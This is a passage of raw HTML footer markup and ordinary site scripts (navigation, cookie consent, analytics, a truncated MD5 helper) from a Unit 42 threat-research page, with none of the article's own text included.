							<a href="https://www.paloaltonetworks.com/sase/access" role="link" title="Prisma Access" data-page-track="true" data-page-track-value="footer:Products and services:Network Security Platform:CLOUD DELIVERED SECURITY SERVICES:Advanced Threat Prevention:DNS Security:Data Loss Prevention:IoT Security:Next-Generation Firewalls:Hardware Firewalls:Strata Cloud Manager:SECURE ACCESS SERVICE EDGE:Prisma Access" target="_blank">Prisma Access</a>
						</li>    
																	<li class="footer-menu-nav__item "> 
							<a href="https://www.paloaltonetworks.com/sase/sd-wan" role="link" title="Prisma SD-WAN" data-page-track="true" data-page-track-value="footer:Products and services:Network Security Platform:CLOUD DELIVERED SECURITY SERVICES:Advanced Threat Prevention:DNS Security:Data Loss Prevention:IoT Security:Next-Generation Firewalls:Hardware Firewalls:Strata Cloud Manager:SECURE ACCESS SERVICE EDGE:Prisma Access:Prisma SD-WAN" target="_blank">Prisma SD-WAN</a>
						</li>    
																	<li class="footer-menu-nav__item "> 
							<a href="https://www.paloaltonetworks.com/sase/adem" role="link" title="Autonomous Digital Experience Management" data-page-track="true" data-page-track-value="footer:Products and services:Network Security Platform:CLOUD DELIVERED SECURITY SERVICES:Advanced Threat Prevention:DNS Security:Data Loss Prevention:IoT Security:Next-Generation Firewalls:Hardware Firewalls:Strata Cloud Manager:SECURE ACCESS SERVICE EDGE:Prisma Access:Prisma SD-WAN:Autonomous Digital Experience Management" target="_blank">Autonomous Digital Experience Management</a>
						</li>    
																	<li class="footer-menu-nav__item "> 
							<a href="https://www.paloaltonetworks.com/sase/next-gen-casb" role="link" title="Cloud Access Security Broker" data-page-track="true" data-page-track-value="footer:Products and services:Network Security Platform:CLOUD DELIVERED SECURITY SERVICES:Advanced Threat Prevention:DNS Security:Data Loss Prevention:IoT Security:Next-Generation Firewalls:Hardware Firewalls:Strata Cloud Manager:SECURE ACCESS SERVICE EDGE:Prisma Access:Prisma SD-WAN:Autonomous Digital Experience Management:Cloud Access Security Broker" target="_blank">Cloud Access Security Broker</a>
						</li>    
																	<li class="footer-menu-nav__item "> 
							<a href="https://www.paloaltonetworks.com/sase/ztna" role="link" title="Zero Trust Network Access" data-page-track="true" data-page-track-value="footer:Products and services:Network Security Platform:CLOUD DELIVERED SECURITY SERVICES:Advanced Threat Prevention:DNS Security:Data Loss Prevention:IoT Security:Next-Generation Firewalls:Hardware Firewalls:Strata Cloud Manager:SECURE ACCESS SERVICE EDGE:Prisma Access:Prisma SD-WAN:Autonomous Digital Experience Management:Cloud Access Security Broker:Zero Trust Network Access" target="_blank">Zero Trust Network Access</a>
						</li>    
					        
					</ul>
				</nav>
						         
            </div>
            <div class="nav-column">
                          													<nav>
					<ul class="footer-menu-nav__list"> 
																	<li class="footer-menu-nav__item nav-title"> 
							<a href="https://www.paloaltonetworks.com/prisma/whyprisma" role="link" title="Code to Cloud Platform" data-page-track="true" data-page-track-value="footer:Products and services:Code to Cloud Platform" target="_blank">Code to Cloud Platform</a>
						</li>    
																	<li class="footer-menu-nav__item "> 
							<a href="https://www.paloaltonetworks.com/prisma/cloud" role="link" title="Prisma Cloud" data-page-track="true" data-page-track-value="footer:Products and services:Code to Cloud Platform:Prisma Cloud" target="_blank">Prisma Cloud</a>
						</li>    
																	<li class="footer-menu-nav__item "> 
							<a href="https://www.paloaltonetworks.com/content/pan/en_US/prisma/cloud/cloud-native-application-protection-platform" role="link" title="Cloud-Native Application Protection Platform" data-page-track="true" data-page-track-value="footer:Products and services:Code to Cloud Platform:Prisma Cloud:Cloud-Native Application Protection Platform" target="_blank">Cloud-Native Application Protection Platform</a>
						</li>    
					        
					</ul>
				</nav>
						            </div>
            <div class="nav-column">
              													<nav>
					<ul class="footer-menu-nav__list"> 
																	<li class="footer-menu-nav__item nav-title"> 
							<a href="https://www.paloaltonetworks.com/cortex" role="link" title="AI-Driven Security Operations Platform" data-page-track="true" data-page-track-value="footer:Products and services:AI-Driven Security Operations Platform" target="_blank">AI-Driven Security Operations Platform</a>
						</li>    
																	<li class="footer-menu-nav__item "> 
							<a href="https://www.paloaltonetworks.com/cortex/cortex-xdr" role="link" title="Cortex XDR" data-page-track="true" data-page-track-value="footer:Products and services:AI-Driven Security Operations Platform:Cortex XDR" target="_blank">Cortex XDR</a>
						</li>    
																	<li class="footer-menu-nav__item "> 
							<a href="https://www.paloaltonetworks.com/cortex/cortex-xsoar" role="link" title="Cortex XSOAR" data-page-track="true" data-page-track-value="footer:Products and services:AI-Driven Security Operations Platform:Cortex XDR:Cortex XSOAR" target="_blank">Cortex XSOAR</a>
						</li>    
																	<li class="footer-menu-nav__item "> 
							<a href="https://www.paloaltonetworks.com/cortex/cortex-xpanse" role="link" title="Cortex Xpanse" data-page-track="true" data-page-track-value="footer:Products and services:AI-Driven Security Operations Platform:Cortex XDR:Cortex XSOAR:Cortex Xpanse" target="_blank">Cortex Xpanse</a>
						</li>    
																	<li class="footer-menu-nav__item "> 
							<a href="https://www.paloaltonetworks.com/cortex/cortex-xsiam" role="link" title="Cortex XSIAM" data-page-track="true" data-page-track-value="footer:Products and services:AI-Driven Security Operations Platform:Cortex XDR:Cortex XSOAR:Cortex Xpanse:Cortex XSIAM" target="_blank">Cortex XSIAM</a>
						</li>    
																	<li class="footer-menu-nav__item "> 
							<a href="https://www.paloaltonetworks.com/cortex/cortex-xpanse/attack-surface-management" role="link" title="External Attack Surface Protection" data-page-track="true" data-page-track-value="footer:Products and services:AI-Driven Security Operations Platform:Cortex XDR:Cortex XSOAR:Cortex Xpanse:Cortex XSIAM:External Attack Surface Protection" target="_blank">External Attack Surface Protection</a>
						</li>    
																	<li class="footer-menu-nav__item "> 
							<a href="https://www.paloaltonetworks.com/cortex/security-operations-automation" role="link" title="Security Automation" data-page-track="true" data-page-track-value="footer:Products and services:AI-Driven Security Operations Platform:Cortex XDR:Cortex XSOAR:Cortex Xpanse:Cortex XSIAM:External Attack Surface Protection:Security Automation" target="_blank">Security Automation</a>
						</li>    
																	<li class="footer-menu-nav__item "> 
							<a href="https://www.paloaltonetworks.com/cortex/detection-and-response" role="link" title="Threat Prevention, Detection &amp; Response" data-page-track="true" data-page-track-value="footer:Products and services:AI-Driven Security Operations Platform:Cortex XDR:Cortex XSOAR:Cortex Xpanse:Cortex XSIAM:External Attack Surface Protection:Security Automation:Threat Prevention, Detection &amp; Response" target="_blank">Threat Prevention, Detection &amp; Response</a>
						</li>    
					        
					</ul>
				</nav>
						            </div>
            <div class="nav-column">
              													<nav>
					<ul class="footer-menu-nav__list"> 
																	<li class="footer-menu-nav__item nav-title"> 
							<a href="https://www.paloaltonetworks.com/unit42" role="link" title="Threat Intel and Incident Response Services" data-page-track="true" data-page-track-value="footer:Products and services:Threat Intel and Incident Response Services" target="_blank">Threat Intel and Incident Response Services</a>
						</li>    
																	<li class="footer-menu-nav__item "> 
							<a href="https://www.paloaltonetworks.com/unit42/assess" role="link" title="Proactive Assessments" data-page-track="true" data-page-track-value="footer:Products and services:Threat Intel and Incident Response Services:Proactive Assessments" target="_blank">Proactive Assessments</a>
						</li>    
																	<li class="footer-menu-nav__item "> 
							<a href="https://www.paloaltonetworks.com/unit42/respond" role="link" title="Incident Response" data-page-track="true" data-page-track-value="footer:Products and services:Threat Intel and Incident Response Services:Proactive Assessments:Incident Response" target="_blank">Incident Response</a>
						</li>    
																	<li class="footer-menu-nav__item "> 
							<a href="https://www.paloaltonetworks.com/unit42/transform" role="link" title="Transform Your Security Strategy" data-page-track="true" data-page-track-value="footer:Products and services:Threat Intel and Incident Response Services:Proactive Assessments:Incident Response:Transform Your Security Strategy" target="_blank">Transform Your Security Strategy</a>
						</li>    
																	<li class="footer-menu-nav__item "> 
							<a href="https://www.paloaltonetworks.com/unit42/threat-intelligence-partners" role="link" title="Discover Threat Intelligence" data-page-track="true" data-page-track-value="footer:Products and services:Threat Intel and Incident Response Services:Proactive Assessments:Incident Response:Transform Your Security Strategy:Discover Threat Intelligence" target="_blank">Discover Threat Intelligence</a>
						</li>    
					        
					</ul>
				</nav>
						            </div>
          </div>
        </div>
        <div class="footer-menu-nav__wrapper">
                      <h3 class="footer-menu-nav__title">Company</h3>
                                <div class="nav-column__wrapper">
          <div class="nav-column">
            													<nav>
					<ul class="footer-menu-nav__list"> 
																	<li class="footer-menu-nav__item "> 
							<a href="https://www.paloaltonetworks.com/about-us" role="link" title="About Us" data-page-track="true" data-page-track-value="footer:Company:About Us" target="_blank">About Us</a>
						</li>    
																	<li class="footer-menu-nav__item "> 
							<a href="https://jobs.paloaltonetworks.com/en/" role="link" title="Careers" data-page-track="true" data-page-track-value="footer:Company:About Us:Careers" target="_blank">Careers</a>
						</li>    
																	<li class="footer-menu-nav__item "> 
							<a href="https://www.paloaltonetworks.com/company/contact-sales" role="link" title="Contact Us" data-page-track="true" data-page-track-value="footer:Company:About Us:Careers:Contact Us" target="_blank">Contact Us</a>
						</li>    
																	<li class="footer-menu-nav__item "> 
							<a href="https://www.paloaltonetworks.com/about-us/corporate-responsibility" role="link" title="Corporate Responsibility" data-page-track="true" data-page-track-value="footer:Company:About Us:Careers:Contact Us:Corporate Responsibility" target="_blank">Corporate Responsibility</a>
						</li>    
																	<li class="footer-menu-nav__item "> 
							<a href="https://www.paloaltonetworks.com/customers" role="link" title="Customers" data-page-track="true" data-page-track-value="footer:Company:About Us:Careers:Contact Us:Corporate Responsibility:Customers" target="_blank">Customers</a>
						</li>    
																	<li class="footer-menu-nav__item "> 
							<a href="https://investors.paloaltonetworks.com/" target="_blank" role="link" title="Investor Relations" data-page-track="true" data-page-track-value="footer:Company:About Us:Careers:Contact Us:Corporate Responsibility:Customers:Investor Relations">Investor Relations</a>
						</li>    
																	<li class="footer-menu-nav__item "> 
							<a href="https://www.paloaltonetworks.com/about-us/locations" role="link" title="Location" data-page-track="true" data-page-track-value="footer:Company:About Us:Careers:Contact Us:Corporate Responsibility:Customers:Investor Relations:Location" target="_blank">Location</a>
						</li>    
																	<li class="footer-menu-nav__item "> 
							<a href="https://www.paloaltonetworks.com/company/newsroom" role="link" title="Newsroom" data-page-track="true" data-page-track-value="footer:Company:About Us:Careers:Contact Us:Corporate Responsibility:Customers:Investor Relations:Location:Newsroom" target="_blank">Newsroom</a>
						</li>    
					        
					</ul>
				</nav>
						          </div>
          </div>
        </div>
        <div class="footer-menu-nav__wrapper">
                      <h3 class="footer-menu-nav__title">Popular links</h3>
                                <div class="nav-column__wrapper">
          <div class="nav-column">
            													<nav>
					<ul class="footer-menu-nav__list"> 
																	<li class="footer-menu-nav__item "> 
							<a href="https://www.paloaltonetworks.com/blog/" role="link" title="Blog" data-page-track="true" data-page-track-value="footer:Popular links:Blog" target="_blank">Blog</a>
						</li>    
																	<li class="footer-menu-nav__item "> 
							<a href="https://www.paloaltonetworks.com/communities" role="link" title="Communities" data-page-track="true" data-page-track-value="footer:Popular links:Blog:Communities" target="_blank">Communities</a>
						</li>    
																	<li class="footer-menu-nav__item "> 
							<a href="https://www.paloaltonetworks.com/resources" role="link" title="Content Library" data-page-track="true" data-page-track-value="footer:Popular links:Blog:Communities:Content Library" target="_blank">Content Library</a>
						</li>    
																	<li class="footer-menu-nav__item "> 
							<a href="https://www.paloaltonetworks.com/cyberpedia" role="link" title="Cyberpedia" data-page-track="true" data-page-track-value="footer:Popular links:Blog:Communities:Content Library:Cyberpedia" target="_blank">Cyberpedia</a>
						</li>    
																	<li class="footer-menu-nav__item "> 
							<a href="https://events.paloaltonetworks.com/" role="link" title="Event Center" data-page-track="true" data-page-track-value="footer:Popular links:Blog:Communities:Content Library:Cyberpedia:Event Center" target="_blank">Event Center</a>
						</li>    
																	<li class="footer-menu-nav__item "> 
							<a href="https://start.paloaltonetworks.com/preference-center" role="link" title="Manage Email Preferences" data-page-track="true" data-page-track-value="footer:Popular links:Blog:Communities:Content Library:Cyberpedia:Event Center:Manage Email Preferences" target="_blank">Manage Email Preferences</a>
						</li>    
																	<li class="footer-menu-nav__item "> 
							<a href="https://www.paloaltonetworks.com/products/products-a-z" role="link" title="Products A-Z" data-page-track="true" data-page-track-value="footer:Popular links:Blog:Communities:Content Library:Cyberpedia:Event Center:Manage Email Preferences:Products A-Z" target="_blank">Products A-Z</a>
						</li>    
																	<li class="footer-menu-nav__item "> 
							<a href="https://www.paloaltonetworks.com/legal-notices/trust-center/tech-certs" role="link" title="Product Certifications" data-page-track="true" data-page-track-value="footer:Popular links:Blog:Communities:Content Library:Cyberpedia:Event Center:Manage Email Preferences:Products A-Z:Product Certifications" target="_blank">Product Certifications</a>
						</li>    
																	<li class="footer-menu-nav__item "> 
							<a href="https://www.paloaltonetworks.com/security-disclosure" role="link" title="Report a Vulnerability" data-page-track="true" data-page-track-value="footer:Popular links:Blog:Communities:Content Library:Cyberpedia:Event Center:Manage Email Preferences:Products A-Z:Product Certifications:Report a Vulnerability" target="_blank">Report a Vulnerability</a>
						</li>    
																	<li class="footer-menu-nav__item "> 
							<a href="https://www.paloaltonetworks.com/sitemap" role="link" title="Sitemap" data-page-track="true" data-page-track-value="footer:Popular links:Blog:Communities:Content Library:Cyberpedia:Event Center:Manage Email Preferences:Products A-Z:Product Certifications:Report a Vulnerability:Sitemap" target="_blank">Sitemap</a>
						</li>    
																	<li class="footer-menu-nav__item "> 
							<a href="https://docs.paloaltonetworks.com/" role="link" title="Tech Docs" data-page-track="true" data-page-track-value="footer:Popular links:Blog:Communities:Content Library:Cyberpedia:Event Center:Manage Email Preferences:Products A-Z:Product Certifications:Report a Vulnerability:Sitemap:Tech Docs" target="_blank">Tech Docs</a>
						</li>    
																	<li class="footer-menu-nav__item "> 
							<a href="https://unit42.paloaltonetworks.com/" role="link" title="Unit 42" data-page-track="true" data-page-track-value="footer:Popular links:Blog:Communities:Content Library:Cyberpedia:Event Center:Manage Email Preferences:Products A-Z:Product Certifications:Report a Vulnerability:Sitemap:Tech Docs:Unit 42">Unit 42</a>
						</li>    
																	<li class="footer-menu-nav__item "> 
							<a href="https://panwedd.exterro.net/portal/dsar.htm?target=panwedd" target="_blank" role="link" title="Do Not Sell or Share My Personal Information" data-page-track="true" data-page-track-value="footer:Popular links:Blog:Communities:Content Library:Cyberpedia:Event Center:Manage Email Preferences:Products A-Z:Product Certifications:Report a Vulnerability:Sitemap:Tech Docs:Unit 42:Do Not Sell or Share My Personal Information">Do Not Sell or Share My Personal Information</a>
						</li>    
					        
					</ul>
				</nav>
						          </div>
          </div>
        </div>
      </div>
    </div>
  </div>
  <div class="footer-bottom"> 
    <div class="l-container"> 
              <div class="footer-logo">
          <a href="https://www.paloaltonetworks.com/" role="link" title="Footer Nav" data-page-track="true" data-page-track-value="footer:logo:Palo Alto Networks">
            <img width="245" height="46" src="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/palo-alto-footer-logo.svg" class="attachment-medium size-medium" alt="" decoding="async" loading="lazy">          </a>
        </div>
            <div class="footer-bottom__wrapper"> 
        <div class="footer-bottom-nav">
                                              <nav>
                <ul class="footer-menu-nav__list"> 
                                                    <li> 
                   <a href="https://www.paloaltonetworks.com/legal-notices/privacy" role="link" title="Privacy" data-page-track="true" data-page-track-value="footer:bottom-menu:Privacy" target="_blank">Privacy</a>
                  </li>    
                                                    <li> 
                   <a href="https://www.paloaltonetworks.com/legal-notices/trust-center" role="link" title="Trust Center" data-page-track="true" data-page-track-value="footer:bottom-menu:Trust Center" target="_blank">Trust Center</a>
                  </li>    
                                                    <li> 
                   <a href="https://www.paloaltonetworks.com/legal-notices/terms-of-use" role="link" title="Terms of Use" data-page-track="true" data-page-track-value="footer:bottom-menu:Terms of Use" target="_blank">Terms of Use</a>
                  </li>    
                                                    <li> 
                   <a href="https://www.paloaltonetworks.com/legal" role="link" title="Documents" data-page-track="true" data-page-track-value="footer:bottom-menu:Documents" target="_blank">Documents</a>
                  </li>    
                        
                </ul>
              </nav>
                                            <br><span class="copyright">Copyright © 2024 Palo Alto Networks. All Rights Reserved</span>
                  </div>
        <div class="footer-bottom-social"> 
          <ul> 
			<li>
			<a href="https://www.youtube.com/user/paloaltonetworks" target="_blank" role="link" title="YouTube" data-page-track="true" data-page-track-value="footer:social:Youtube">
				<img class="lozad" data-src="https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/youtube-black.svg" alt="YouTube">
			</a>
		</li>
				<li> 
			<a href="https://twitter.com/Unit42_Intel" target="_blank" role="link" title="X" data-page-track="true" data-page-track-value="footer:social::Twitter">
				<img class="lozad" data-src="https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/x-icon-black.svg" alt="Twitter">
			</a>
		</li>
				<li> 
			<a href="https://www.facebook.com/PaloAltoNetworks/" target="_blank" role="link" title="Facebook" data-page-track="true" data-page-track-value="footer:social:Facebook">
				<img class="lozad" data-src="https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/Facebook_Icon.svg" alt="Facebook">
			</a>
		</li>
				<li> 
			<a href="https://www.linkedin.com/company/palo-alto-networks" target="_blank" role="link" title="LinkedIn" data-page-track="true" data-page-track-value="footer:social:LinkedIn">
				<img class="lozad" data-src="https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/LinkedIn_Icon.svg" alt="LinkedIn">
			</a>
		</li>
	                <li> 
			<a href="https://unit42.paloaltonetworks.com/unit-42-threat-vector-podcast/" role="link" title="Podcast" data-page-track="true" data-page-track-value="footer:social:Podcast">
                            <img class="lozad" data-src="https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/Podcast.svg" alt="Podcast">
			</a>
		</li>
</ul>          
	<div class="pa language-dropdown">
			<div class="language-dropdown__wrapper"> 
			<img src="https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/globe-icon.svg" alt="Globe icon">
			<span id="selectedLanguage">EN</span>
			<img src="https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/down-arrow.svg" alt="Down arrow"><ul><li class="title">Select your language</li>
					<li class="selected" data-value="en"> 
						<a data-page-track="true" data-page-track-value="footer:language-selector:en" href="https://unit42.paloaltonetworks.com/silent-skimmer-latest-campaign/">USA (ENGLISH)</a>
					</li></ul>        </div>
      </div>
    </div>
  </div>
</div></div></footer>
<div class="dd-overlay">
</div>
<!--  Start: video modal -->
<div class="modal video__modal" id="videoModal" tabindex="-1">
        <div class="modal__video-wrapper">
          <button class="modal__play-btn is-minimized is-paused" id="playPauseBtn">
            <img class="play" src="https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-play-icon.svg" alt="Play">
            <img class="pause" src="https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-pause-icon1.svg" alt="Pause">
          </button>
          <button class="modal__minimize-btn is-minimized">
            <img src="https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-minimize.svg" alt="Minimize">
          </button>
          <button class="modal__close"> 
            <img src="https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/close-modal.svg" alt="Close button">
          </button>
          <video class="modal__video" id="customVideo">
            <source src="" type="video/mp4">Your browser does not support the video tag.
          </video>
          <div class="modal__post-details" tabindex="-1">       
              <h3>Default Heading</h3>
              <a class="l-btn" href="#" title="Right Arrow Icon" role="link" data-page-track="true" data-page-track-value="overview:explore reports:View all reports">Read the article
              <img src="https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/right-arrow.svg" alt="Right Arrow">
              </a>
          </div>
          <div class="modal__video-controls">
            <div class="modal__video-seekbar input__wrapper"><span style="width: 1%;"></span>
              <label class="is-hidden" for="modalSeekBar">Seekbar</label>
              <input class="custom-range" id="modalSeekBar" type="range" min="0" max="100" value="1">
              <p class="modal__remaining-time"></p>
            </div>
            <button class="modal__play-btn is-paused" id="playPauseBtn">
            <img class="play" src="https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-play-icon.svg" alt="Play">
            <img class="pause" src="https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-pause-icon1.svg" alt="Pause">
          </button>
            <div class="modal__volume-controls">
              <div class="modal__volume__wrapper">
                <button tabindex="0">
                  <img src="https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-volume.svg" alt="Volume">
                </button>
                <div class="modal__volume-seekbar"><span style="width: 70%;"></span>
                  <label class="is-hidden" for="volumeBar">Volume</label>
                  <input class="volume__bar" id="volumeBar" type="range" min="0" max="1" step="0.1" value="0.7">
                </div>
              </div>
              <button class="modal__minimize-btn" id="minimizeBtn">
                <img src="https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-minimize.svg" alt="Minimize">
              </button>
            </div>
          </div>
        </div>
      </div><!--  End: video modal -->

    <script type="text/javascript">
	var isProcessing = false; 
    function alter_ul_post_values(obj,post_id,ul_type){
	
		if (isProcessing)    
		return;  
		isProcessing = true;   
		var like_nonce = jQuery('#_wpnonce').val();
		jQuery(obj).find("span").html("..");
                jQuery.ajax({
                    type: "POST",
                    url: "https://unit42.paloaltonetworks.com/wp-content/plugins/like-dislike-counter-for-posts-pages-and-comments/ajax_counter.php",
                    data: "post_id="+post_id+"&up_type="+ul_type+"&ul_nonce="+like_nonce,
                    success: function(msg){
                            jQuery(obj).find("span").html(msg);
                            isProcessing = false; 
                            jQuery(obj).find('svg').children('path').attr('stroke','#0050FF');
                            jQuery(obj).removeClass('idc_ul_cont_not_liked idc_ul_cont_not_liked_inner');
                    }
 		});
	}
	</script>
    <link rel="stylesheet" id="wpdevart_lightbox_front_end_css-css" href="https://unit42.paloaltonetworks.com/wp-content/plugins/lightbox-popup/includes/style/wpdevart_lightbox_front.css?ver=6.6.2" media="all">
<script src="https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/js/script.js?ver=1.0.0" id="unit42-v6-navigation-js"></script>

<!--  Start: Scripts Migrated From Unit42-v5 -->
<script type="text/javascript">
const observer_lozad = lozad('.lozad, .lozad-background'); // lazy loads elements with default selector as '.lozad'
observer_lozad.observe();

window.PAN_Clean_Util = {
        isIE: false
};

(function () {
   // INP Util Fix
    function yieldToMain(ms) {
        return new Promise(resolve => setTimeout(resolve, ms));
    }
   window.PAN_Clean_Util.yieldToMain = yieldToMain
})();

if(referer == "Prisma" || referer == "Cortex" || referer == "Sase" || referer == "Unit" || referer == "Ngfw"){
  var Coveo_organizationId = "paloaltonetworksintranet";        
  var techDocsPagePath = "https://docs.paloaltonetworks.com/search.html#hd=All%20Prisma%20Cloud%20Documentation&hq=%40panproductcategory%3D%3D(%22Prisma%20Cloud%22)&sort=relevancy&layout=card&numberOfResults=25";
  var languageFromPath="en_US";
  window.Granite = window.Granite || {};
  Granite.I18n = (function() {
  var self = {};
  self.setLocale = function(locale) { };
  self.get = function(text, snippets, note) {
    var out = "";
    if(text){
      if(text ==="coveo.clear"){
        out = "Clear";
      }else if(text ==="coveo.noresultsfound"){
        out = "No results found for this search term.";
      }
    }
    return out;
  };
  return self
  }());
}

  var main_site_critical_top = maindomain_lang+'/etc.clientlibs/panClean/components/mainNavigationComp/clientlibs/panClean/criticalTop.min.js';
  var main_site_defered = maindomain_lang+'/etc.clientlibs/panClean/components/mainNavigationComp/clientlibs/panClean/defered.min.js';
  var main_site_criticalTopBase = maindomain_lang+'/etc.clientlibs/panClean/components/mainNavigationComp/clientlibs/panClean/criticalTopBase.min.js';
  var main_site_criticalTopProductNav = maindomain_lang+'/etc.clientlibs/panClean/components/mainNavigationComp/clientlibs/panClean/criticalTopProductNav.min.js';
window.PAN_MainNavAsyncUrl = maindomain_lang+"/_jcr_content/globals/cleanHeaderPrisma.prismaRenderer.html";

function loadScript(url, defer){
    var script1 = document.createElement('script');
    script1.setAttribute('type', 'text/javascript');
    script1.setAttribute('src',url);
    if(defer == true){
        script1.setAttribute('defer','defer');
    }
    document.head.appendChild(script1);
}
function loadScript1(url, callback){

    var script = document.createElement("script")
    script.type = "text/javascript";
    if (script.readyState){  //IE
        script.onreadystatechange = function(){
            if (script.readyState == "loaded" || script.readyState == "complete"){
                script.onreadystatechange = null;
                callback();
            }
        };
    } else {  //Others
        script.onload = function(){
            callback();
        };
    }
    script.src = url;
    document.getElementsByTagName("head")[0].appendChild(script);
}
if(referer == "Prisma" || referer == "Cortex" || referer == "Sase" || referer == "Unit" || referer == "Ngfw"){
	if(referer == "Unit"){
    setTimeout(function(){
      loadScript(main_site_criticalTopBase, false);
      loadScript1(main_site_criticalTopProductNav, function(){
        window.PAN_initializeProduct2021Nav();
      });
      loadScript(main_site_defered, false);
    }, 3000);
	}
	else{
    setTimeout(function(){
      loadScript1(main_site_critical_top, function(){
        window.PAN_initializeProduct2021Nav();
      });
      loadScript(main_site_defered, false);
    }, 3000);
	}
}

$(document).ready(function () {
    setTimeout(function(){
      $('.article-banner .ab__options ul li a').each(function(){
          	$(this).attr('target', "_blank");
      });
    }, 4000);
});
</script>
<!--  End: Scripts Migrated From Unit42-v5 -->



<!-- OneTrust Cookies Consent Notice start for paloaltonetworks.com -->
<script src="https://cdn.cookielaw.org/scripttemplates/otSDKStub.js" data-document-language="true" type="text/javascript" charset="UTF-8" data-domain-script="8380accb-00d6-4b05-90ec-6d405f7310d6"></script>
<script type="text/javascript">
function OptanonWrapper() { }
</script>
<!-- OneTrust Cookies Consent Notice end for paloaltonetworks.com --><script>
  function callBuyBox(content) {
    let body = $("body");
    let buyBox = `<div id='buyBox'></div>`;
    let innerHTML = "";
    body.append(buyBox);
    content.forEach(itm => {
      innerHTML += `<div class="content"><a class="callout" data-page-track="true" data-page-track-value="${itm.trackValue}" href=${itm.href}>${itm.thumbPath} <span class="title">${itm.title}</span> </a></div>`;
    });
    $("#buyBox").append(innerHTML);
    $(buyBox).mouseover(function() {
      //Track Hover State
      _satellite.track("callbox_flyout");
    });
  }
</script>
<style type="text/css">
  #buyBox {
    z-index: 999;
    font-family: Montserrat, Arial, sans-serif;
    font-weight: bold;
    position: fixed;
    top: 45%;
    right: 0;
    transform: translateY(-50%);
    background: white;
    border-top-left-radius: 10px;
    border-bottom-left-radius: 10px;
    width: 45px;
    box-sizing: border-box;
    min-height: 30px;
    margin: 20px 0;
    padding: 5px 10px;
    overflow: hidden;
    box-shadow: 0 6px 20px rgba(54, 66, 75, 0.1);
    transition: all 0.4s ease-in;
  }
  #buyBox .content {
    margin: 15px 0px;
  }
  #buyBox .content .callout {
    color: #727272;
    display: table;
    text-decoration: none;
    position: relative;
  }
  #buyBox .content .callout:before {
    content: "";
    display: inline-block;
    width: 27px;
    height: 27px;
    position: absolute;
    border-radius: 50%;
    padding: 5px;
    left: 0px;
    top: 0px;
    transition: all 0.2s ease-in;
    z-index: 1;
    opacity: 0;
  }
  #buyBox .content .callout svg {
    display: table-cell;
    width: 17px;
    margin-left: 5px;
    margin-top: 2px;
    z-index: 1000;
  }
  #buyBox .content .callout .title {
    display: table-cell;
    vertical-align: middle;
    padding-left: 18px;
    line-height: 10px;
    min-width: 200px;
    text-transform: capitalize;
    font-size: 11px;
  }
  #buyBox .content svg path {
    stroke: #727272;
  }
  #buyBox:hover .content svg path {
    stroke: #727272;
  }
  #buyBox .content .callout:hover:before {
    opacity: 0;
  }
  #buyBox .content:hover .callout:hover:before {
    background: #555555;
  }
  #buyBox .content:hover .callout:hover .title {
    color: #ff2e00;
  }
  #buyBox .content:hover svg path {
    stroke: #ff2e00;
  }
  #buyBox:hover {
    width: 200px;
  }
  
</style><script>_satellite["_runScript1"](function(event, target, Promise) {
if(!window.webData) window.webData = {};
if(!window.crypto || !window.crypto.encrypt || !window.crypto.getParameterByName){
	if(!window.crypto) window.crypto = {};
	(function(e){function r(e){return h(l(v(e)))}function i(e){return p(l(v(e)))}function s(e,t){return d(l(v(e)),t)}function o(e,t){return h(c(v(e),v(t)))}function u(e,t){return p(c(v(e),v(t)))}function a(e,t,n){return d(c(v(e),v(t)),n)}function f(){return r("abc").toLowerCase()=="900150983cd24fb0d6963f7d28e17f72"}function l(e){return b(w(y(e),e.length*8))}function c(e,t){var n=y(e);if(n.length>16)n=w(n,e.length*8);var r=Array(16),i=Array(16);for(var s=0;s<16;s++){r[s]=n[s]^909522486;i[s]=n[s]^1549556828}var o=w(r.concat(y(t)),512+t.length*8);return b(w(i.concat(o),512+128))}function h(e){try{t}catch(n){t=0}var r=t?"0123456789ABCDEF":"0123456789abcdef";var i="";var s;for(var o=0;o<e.length;o++){s=e.charCodeAt(o);i+=r.charAt(s>>>4&15)+r.charAt(s&15)}return i}function p(e){try{n}catch(t){n=""}var r="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";var i="";var s=e.length;for(var o=0;o<s;o+=3){var u=e.charCodeAt(o)<<16|(o+1<s?e.charCodeAt(o+1)<<8:0)|(o+2<s?e.charCodeAt(o+2):0);for(var a=0;a<4;a++){if(o*8+a*6>e.length*8)i+=n;else i+=r.charAt(u>>>6*(3-a)&63)}}return i}function d(e,t){var n=t.length;var r,i,s,o,u;var a=Array(Math.ceil(e.length/2));for(r=0;r<a.length;r++){a[r]=e.charCodeAt(r*2)<<8|e.charCodeAt(r*2+1)}var f=Math.ceil(e.length*8/(Math.log(t.length)/Math.log(2)));var l=Array(f);for(i=0;i<f;i++){u=Array();o=0;for(r=0;r<a.length;r++){o=(o<<16)+a[r];s=Math.floor(o/n);o-=s*n;if(u.length>0||s>0)u[u.length]=s}l[i]=o;a=u}var c="";for(r=l.length-1;r>=0;r--)c+=t.charAt(l[r]);return c}function v(e){var t="";var n=-1;var 